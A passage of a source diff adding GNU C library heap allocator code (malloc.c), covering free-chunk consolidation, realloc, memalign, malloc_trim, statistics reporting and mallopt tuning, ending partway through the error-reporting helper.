+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      __libc_lock_lock (av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      __libc_lock_unlock (av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, NULL);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = chunksize (p);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = prev_size (p);
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+  check_action = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message ((action & 2) ? (do_abort | do_backtrace) : do_message,
+		    "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
